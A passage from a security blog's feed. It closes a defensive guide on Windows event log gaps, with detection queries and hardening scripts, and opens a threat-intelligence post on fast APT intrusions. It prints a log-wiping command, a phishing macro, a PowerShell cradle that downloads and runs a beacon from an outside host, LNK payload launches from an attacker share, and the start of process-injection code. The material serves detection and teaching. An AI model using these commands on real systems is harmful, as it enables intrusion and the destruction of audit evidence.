class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Remove-EventLog -LogName Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Does NOT generate 1102  the channel is gone before the event can be written</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Generates 104 in System log (log service error)</span><br></span></code></pre></div></div>\n<p>Detecting log clearing:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Alert on Event 1102 (Security log cleared)  rare legitimate event</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SecurityEvent</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where EventID == 1102</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Computer, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Account = tostring(EventData.SubjectUserName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          LogonId = tostring(EventData.SubjectLogonId)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Also alert on Event 104 (System log) which indicates service-level log removal</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where EventLog == \"System\" and EventID == 104</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Computer, RenderedDescription</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"73-etw-provider-tampering-advanced\">7.3 ETW Provider Tampering (Advanced)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#73-etw-provider-tampering-advanced\" class=\"hash-link\" aria-label=\"Direct link to 7.3 ETW Provider Tampering (Advanced)\" title=\"Direct link to 7.3 ETW Provider Tampering (Advanced)\" translate=\"no\">​</a></h3>\n<p>A sophisticated attacker can tamper with ETW at the kernel level, disabling specific providers without triggering log-clearing events:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Technique: Patch the ETW provider registration in the target process's memory</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
16%)\"><span class=\"token plain\">to return early from the ETW write function, silently suppressing all</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">events from that provider without any Event ID 1102, 4719, or 104 appearing.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Detection: </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- Compare expected vs. actual event volumes (Section 6.2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- Monitor for Sysmon Event ID 1 (process creation) with known ETW-patching</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  tool signatures in CommandLine field</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- Check ETW session buffer loss counters (Section 1.2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- Synthetic event injection will catch this (Section 6.3)</span><br></span></code></pre></div></div>\n<p>There is no single event that fires when ETW is patched in memory. 
Volume baselining per channel and provider, together with an integrity check of the in-memory ETW write routine against a known-good copy (the kind of check an EDR performs), is what remains.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-8--the-hardening-roadmap-fix-it-this-week\">Part 8  The Hardening Roadmap: Fix It This Week<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-8--the-hardening-roadmap-fix-it-this-week\" class=\"hash-link\" aria-label=\"Direct link to Part 8  The Hardening Roadmap: Fix It This Week\" title=\"Direct link to Part 8  The Hardening Roadmap: Fix It This Week\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-1-do-this-today\">Priority 1 (Do This Today)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#priority-1-do-this-today\" class=\"hash-link\" aria-label=\"Direct link to Priority 1 (Do This Today)\" title=\"Direct link to Priority 1 (Do This Today)\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># 1. 
Verify the audit policy override flag (SCENoApplyLegacyAuditPolicy) is set on all DCs and critical servers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Expected: a line ending in SCENoApplyLegacyAuditPolicy=4,1 (1 = \"Audit: Force audit policy subcategory settings...\" Enabled)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Invoke-Command -ComputerName \"DC01\",\"DC02\",\"SERVER01\" -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    secedit /export /cfg \"$env:TEMP\\secpol.cfg\" /quiet | Out-Null</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-String \"MACHINE\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\SCENoApplyLegacyAuditPolicy\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        \"$env:TEMP\\secpol.cfg\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># 2. 
Check that process creation (4688) IS generating events on at least one DC</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$recent4688 = Get-WinEvent -ComputerName \"DC01\" -LogName Security `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -FilterXPath \"*[System[EventID=4688 and TimeCreated[timediff(@SystemTime) &lt;= 3600000]]]\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -MaxEvents 5 -ErrorAction SilentlyContinue</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if (-not $recent4688) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Warning \"No 4688 events in last hour on DC01: audit policy not configured correctly, or logging suppressed\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># 3. 
Check command-line logging is enabled</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$cmdLineSetting = Invoke-Command -ComputerName \"DC01\" -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $path = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    (Get-ItemProperty -Path $path -Name \"ProcessCreationIncludeCmdLine_Enabled\" -EA SilentlyContinue).ProcessCreationIncludeCmdLine_Enabled</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if ($cmdLineSetting -ne 1) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Warning \"Command-line logging NOT enabled on DC01: all 4688 events have an empty CommandLine\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-2-this-week\">Priority 2 (This Week)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#priority-2-this-week\" class=\"hash-link\" aria-label=\"Direct link to Priority 2 (This Week)\" title=\"Direct link to Priority 2 (This Week)\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 
16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Resize Security log on all DCs to 4GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$dcs = (Get-ADDomainController -Filter *).Name</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($dc in $dcs) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Invoke-Command -ComputerName $dc -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        wevtutil sl Security /ms:4294967296        # 4GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        wevtutil sl Microsoft-Windows-Sysmon/Operational /ms:2147483648  # 2GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        wevtutil sl Microsoft-Windows-PowerShell/Operational /ms:1073741824  # 1GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"$env:COMPUTERNAME log sizes updated\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-3-this-month\">Priority 3 (This Month)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#priority-3-this-month\" class=\"hash-link\" aria-label=\"Direct link to Priority 3 (This Month)\" title=\"Direct link to Priority 3 (This Month)\" 
translate=\"no\">​</a></h3>\n<p>Deploy the synthetic event injection test as a scheduled task on 10 representative hosts (DCs, critical servers, sample workstations). Run every 4 hours. Alert in SIEM if any marker is absent after 15 minutes. This gives you continuous, automated validation of collection fidelity  the metric that turns this from a one-time audit into an ongoing operational control.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-complete-gap-inventory-what-to-check-and-how\">The Complete Gap Inventory: What to Check and How<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#the-complete-gap-inventory-what-to-check-and-how\" class=\"hash-link\" aria-label=\"Direct link to The Complete Gap Inventory: What to Check and How\" title=\"Direct link to The Complete Gap Inventory: What to Check and How\" translate=\"no\">​</a></h2>\n<table><thead><tr><th>Gap</th><th>Detection Method</th><th>Tool</th><th>Time to Verify</th></tr></thead><tbody><tr><td>Audit policy not generating events</td><td>auditpol /get /category:*</td><td>auditpol.exe</td><td>5 min per host</td></tr><tr><td>Legacy/advanced policy conflict</td><td>Check for SCENoApplyLegacyAuditPolicy=0</td><td>secedit / registry</td><td>10 min</td></tr><tr><td>Command-line logging disabled</td><td>Registry check</td><td>PowerShell</td><td>2 min per host</td></tr><tr><td>Log sizes too small</td><td>wevtutil gl Security</td><td>wevtutil.exe</td><td>2 min per host</td></tr><tr><td>WEF subscription filter errors</td><td>Test XPath with Get-WinEvent -FilterXPath</td><td>PowerShell</td><td>15 min</td></tr><tr><td>WEC server dropping events</td><td>ETW Buffers Lost performance counter</td><td>Get-Counter</td><td>10 min</td></tr><tr><td>WEF delivery mode too slow</td><td>wecutil gs &lt;subscription&gt; DeliveryMaxLatency</td><td>wecutil.exe</td><td>5 min</td></tr><tr><td>Stale WEF sources</td><td>wecutil gr &lt;subscription&gt; 
LastHeartbeat</td><td>wecutil.exe</td><td>15 min</td></tr><tr><td>EventRecordID gaps in SIEM</td><td>Compare source RecordId vs. SIEM query</td><td>PowerShell + SIEM</td><td>30 min</td></tr><tr><td>Volume baseline deviation</td><td>SIEM query comparing last hour to 7-day avg</td><td>SIEM</td><td>Ongoing</td></tr><tr><td>Audit log cleared (1102)</td><td>Alert rule in SIEM</td><td>SIEM</td><td>Deploy now</td></tr><tr><td>Audit policy tampered (4719)</td><td>Alert rule in SIEM</td><td>SIEM</td><td>Deploy now</td></tr><tr><td>ETW tampering</td><td>Synthetic injection test</td><td>Scheduled PowerShell</td><td>Deploy weekly</td></tr></tbody></table>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references\">References<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#references\" class=\"hash-link\" aria-label=\"Direct link to References\" title=\"Direct link to References\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\">Microsoft Learn: \"Use Windows Event Forwarding to help with intrusion detection\"</li>\n<li class=\"\">Palantir: windows-event-forwarding GitHub repository (production WEF architecture)</li>\n<li class=\"\">Elastic: \"The Essentials of Central Log Collection with WEF/WEC\"</li>\n<li class=\"\">MITRE ATT&amp;CK T1562.002: Impair Defenses: Disable Windows Event Logging</li>\n<li class=\"\">MITRE ATT&amp;CK T1070.001: Indicator Removal: Clear Windows Event Logs</li>\n<li class=\"\">Microsoft Learn: Event ID 1102 and 4719 documentation</li>\n<li class=\"\">NSA/CISA: \"Windows Event Logging and Forwarding\" (NSA-CSI-18-130)</li>\n<li class=\"\">Malware Archaeology: Windows Logging Cheat Sheet v2019</li>\n<li class=\"\">Roberto Rodriguez (Cyb3rWard0g): ThreatHunter-Playbook, ETW research</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/network-forensics-lateral-movement-dns-netflow-auth-logs\">Network Forensics Without a Tap</a>: when event logs are disabled or cleared, reconstruct movement from DNS, NetFlow, and DHCP</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/apt-initial-access-to-domain-dominance-4-hours\">How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours</a>: the specific Event IDs that expose each stage of an APT attack chain</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/how-attackers-abuse-entra-id-oauth-without-malware\">How Attackers Abuse Entra ID &amp; OAuth Without Malware</a>: cloud identity events that require separate collection pipelines from on-prem logs</li>\n</ul>\n<hr>\n<p><em>All commands in this post are standard Windows administrative utilities and PowerShell built-ins. They operate on logs you have administrative access to. This is a defensive operations guide.</em></p>",
            "url": "https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events",
            "title": "Windows Event Log Architecture: Why Your SIEM Is Probably Missing 30% of Events and How to Verify It",
            "summary": "The 10 failure points across 4 layers where Windows events silently disappear before reaching your SIEM  and the scripts to measure your actual collection fidelity.",
            "date_modified": "2026-04-18T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "detection-engineering",
                "soc-operations",
                "windows-security",
                "event-logging",
                "siem",
                "wef",
                "audit-policy",
                "etw"
            ]
        },
        {
            "id": "https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours",
            "content_html": "<blockquote>\n<p><em>You're staring at an EDR alert from 11:47 PM. A Word document spawned PowerShell. By the time your analyst acknowledges the ticket at 12:09 AM, the attacker already has a beacon calling home, has run BloodHound across your entire AD, dumped credentials from LSASS, and is authenticating to your domain controller with a Domain Admin hash. The \"200-day dwell time\" you quoted last quarter's board meeting is about to become a footnote. This intrusion will be over in four hours.</em></p>\n</blockquote>\n<p><strong>Category:</strong> Threat Intelligence · <strong>Reading time:</strong> 25 min · <strong>Audience:</strong> SOC Analysts, Detection Engineers, Incident Responders</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-1--the-4-hour-clock-why-dwell-time-statistics-are-killing-your-security-posture\">Section 1  The 4-Hour Clock: Why Dwell Time Statistics Are Killing Your Security Posture<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-1--the-4-hour-clock-why-dwell-time-statistics-are-killing-your-security-posture\" class=\"hash-link\" aria-label=\"Direct link to Section 1  The 4-Hour Clock: Why Dwell Time Statistics Are Killing Your Security Posture\" title=\"Direct link to Section 1  The 4-Hour Clock: Why Dwell Time Statistics Are Killing Your Security Posture\" translate=\"no\">​</a></h2>\n<p>The \"197-day average dwell time\" figure has been cited in board decks and budget justifications for a decade. It is not wrong  it is simply irrelevant to how modern targeted intrusions unfold.</p>\n<p>That average is anchored by two outlier scenarios: low-sophistication actors who establish persistence and sit idle, and nation-state espionage campaigns deliberately designed for long-term quiet collection. 
Neither describes your ransomware operator, your financially motivated eCrime group, or an actor running a targeted smash-and-grab on intellectual property.</p>\n<p>The metric that matters for defenders is <strong>breakout time</strong>: the elapsed time from an adversary gaining initial access on the first host to beginning lateral movement to a second host. Industry reporting from 2024 puts the median at <strong>62 minutes</strong>. The fastest recorded case was under <strong>3 minutes</strong>.</p>\n<p>This single statistic should reshape how you think about every SLA in your SOC.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-the-timeline-actually-looks-like\">What the Timeline Actually Looks Like<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#what-the-timeline-actually-looks-like\" class=\"hash-link\" aria-label=\"Direct link to What the Timeline Actually Looks Like\" title=\"Direct link to What the Timeline Actually Looks Like\" translate=\"no\">​</a></h3>\n<p>The following is a composite timeline reconstructed from multiple public DFIR reports, combining elements from documented intrusions by groups including SCATTERED SPIDER, Cl0p affiliates during the MOVEit campaign, and ALPHV/BlackCat operators. 
No single engagement will match this exactly, but every element below has been observed in documented intrusions within the timeframes noted.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-your-current-slas-cannot-keep-up\">Why Your Current SLAs Cannot Keep Up<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#why-your-current-slas-cannot-keep-up\" class=\"hash-link\" aria-label=\"Direct link to Why Your Current SLAs Cannot Keep Up\" title=\"Direct link to Why Your Current SLAs Cannot Keep Up\" translate=\"no\">​</a></h3>\n<p>If your P1 acknowledgment SLA is 15 minutes and your containment SLA is 4 hours, you are structurally incapable of preventing lateral movement against an adversary operating on this timeline. The math does not work, and tuning detections without addressing response velocity is rearranging deck chairs.</p>\n<p>This is not an argument for panic; it is an argument for <strong>automated containment triggers on specific high-confidence events</strong>, rather than relying on a human in the loop for every step of the response chain.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-2--technical-anatomy-of-a-fast-pivot\">Section 2 - Technical Anatomy of a Fast Pivot<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-2--technical-anatomy-of-a-fast-pivot\" class=\"hash-link\" aria-label=\"Direct link to Section 2 - Technical Anatomy of a Fast Pivot\" title=\"Direct link to Section 2 - Technical Anatomy of a Fast Pivot\" translate=\"no\">​</a></h2>\n<p>Speed comes from tooling that has been refined over years of red team and criminal operator use. 
Here is exactly what the execution looks like at the command level.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-1-establishing-the-foothold\">Stage 1: Establishing the Foothold<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-1-establishing-the-foothold\" class=\"hash-link\" aria-label=\"Direct link to Stage 1: Establishing the Foothold\" title=\"Direct link to Stage 1: Establishing the Foothold\" translate=\"no\">​</a></h3>\n<p><strong>Macro-based initial access (still common in targeted attacks):</strong></p>\n<div class=\"language-vba codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-vba codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">' Embedded in .doc / .xlsm delivered via phishing</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Sub AutoOpen()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Dim wsh As Object</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Set wsh = CreateObject(\"WScript.Shell\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ' Download and execute in-memory via PowerShell</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    wsh.Run \"powershell -nop -w hidden -enc \" &amp; Base64EncodedPayload, 0, False</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">End 
Sub</span><br></span></code></pre></div></div>\n<p>The encoded payload typically resolves to something like:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Decoded: download and reflectively load a beacon</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$data = (New-Object System.Net.WebClient).DownloadData('https://cdn-update[.]com/update.bin')</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$asm = [System.Reflection.Assembly]::Load($data)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$asm.EntryPoint.Invoke($null, $null)</span><br></span></code></pre></div></div>\n<p>Nothing touches disk. 
The beacon is loaded into the PowerShell process memory space directly.</p>\n<p><strong>ISO/LNK delivery (bypasses Mark-of-the-Web):</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># LNK target field (visible in properties or forensic tools):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\cmd.exe /c start \\\\attacker-host\\share\\payload.dll</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># OR via GLOBALROOT UNC (bypasses drive-letter path checks):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\cmd.exe /c start \\\\?\\GLOBALROOT\\Device\\Mup\\attacker-host\\share\\payload.dll</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># OR simpler:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\rundll32.exe payload.dll,EntryPoint</span><br></span></code></pre></div></div>\n<p>ISO files mounted by double-click in Windows 10/11 do not inherit MOTW from the container, so SmartScreen and Attachment Manager do not flag the contents.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-2-process-injection--getting-out-of-the-initial-process\">Stage 2: Process Injection  Getting Out of the Initial Process<a 
href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-2-process-injection--getting-out-of-the-initial-process\" class=\"hash-link\" aria-label=\"Direct link to Stage 2: Process Injection  Getting Out of the Initial Process\" title=\"Direct link to Stage 2: Process Injection  Getting Out of the Initial Process\" translate=\"no\">​</a></h3>\n<p>Staying inside <code>WINWORD.EXE</code> or <code>powershell.exe</code> is noisy. The first task after payload execution is migrating into a less suspicious process.</p>\n<p><strong>Classic CreateRemoteThread injection (loud, still used by lower-tier actors):</strong></p>\n<div class=\"language-c codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-c codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Attacker-side: inject shellcode into target PID</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">HANDLE hProc </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">OpenProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">PROCESS_ALL_ACCESS</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> FALSE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> targetPID</span><span class=\"token 
